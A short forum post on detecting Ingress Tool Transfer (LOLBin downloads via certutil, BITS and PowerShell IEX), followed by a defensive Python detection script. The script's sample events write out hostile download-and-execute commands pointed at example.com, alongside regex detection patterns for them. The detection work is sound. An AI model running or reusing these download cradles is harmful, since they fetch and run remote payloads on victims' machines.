
Usually Ingress Tool Transfer translates to abuse of LOLBins, turning them into puppets to download malicious content. This can be blocked with network filters without a doubt, but can also be achieved via PowerShell monitoring (they may try downloading via BITS, IEX and others). Or they may use techniques such as process hollowing, abusing certutil and others. By monitoring API and LOLBin calls and by plugging into AMSI, you can detect these even without a network filter.

https://attack.mitre.org/techniques/T1105/


But of course, if you have network filters, even better.
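As an added illustration of the host-side monitoring the post describes (not code from the original post or from MalwareTips), the following Python runs a few detection rules for LOLBin and PowerShell download patterns (certutil, BITS, IEX download cradles) over constructed telemetry. The record layout (`type`, `image`, `cmd`, `text`) is an assumed simplification of Sysmon process-creation and PowerShell script-block (Event 4104) data, and the sample events are constructed, not real logs.

```python
import re

# Constructed sample telemetry (assumed field names, not real logs):
# Sysmon-style process creations and PowerShell script-block text.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://example.com/a.bin a.bin"},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": "bitsadmin /transfer job /download http://example.com/b.dll C:\\Users\\Public\\b.dll"},
    {"type": "scriptblock",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://example.com/c.ps1')"},
    # Benign noise: certutil used for its intended purpose, ordinary PowerShell.
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": "certutil.exe -verify cert.cer"},
    {"type": "scriptblock", "text": "Get-ChildItem C:\\Temp | Measure-Object"},
]

URL = re.compile(r"https?://", re.IGNORECASE)

# Each rule: (name, event type, predicate). The predicates encode the
# LOLBin / PowerShell download behaviours mentioned in the post.
RULES = [
    ("certutil_download", "process",
     lambda e: e["image"].lower().endswith("certutil.exe")
               and "-urlcache" in e["cmd"].lower() and URL.search(e["cmd"])),
    ("bits_download", "process",
     lambda e: e["image"].lower().endswith("bitsadmin.exe")
               and "/transfer" in e["cmd"].lower() and URL.search(e["cmd"])),
    ("ps_download_cradle", "scriptblock",
     lambda e: re.search(r"\b(iex|invoke-expression)\b", e["text"], re.I)
               and re.search(r"downloadstring|downloadfile|invoke-webrequest|"
                             r"start-bitstransfer|net\.webclient", e["text"], re.I)),
]

def detect(events):
    """Return (rule_name, event) for every event that matches a rule."""
    hits = []
    for e in events:
        for name, etype, pred in RULES:
            if e["type"] == etype and pred(e):
                hits.append((name, e))
    return hits

if __name__ == "__main__":
    for name, e in detect(SAMPLE_EVENTS):
        print(name, "->", e.get("cmd") or e.get("text"))
```

The two benign events produce no hits, which is the point of tying each rule to both the binary and a download indicator rather than to the binary alone.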

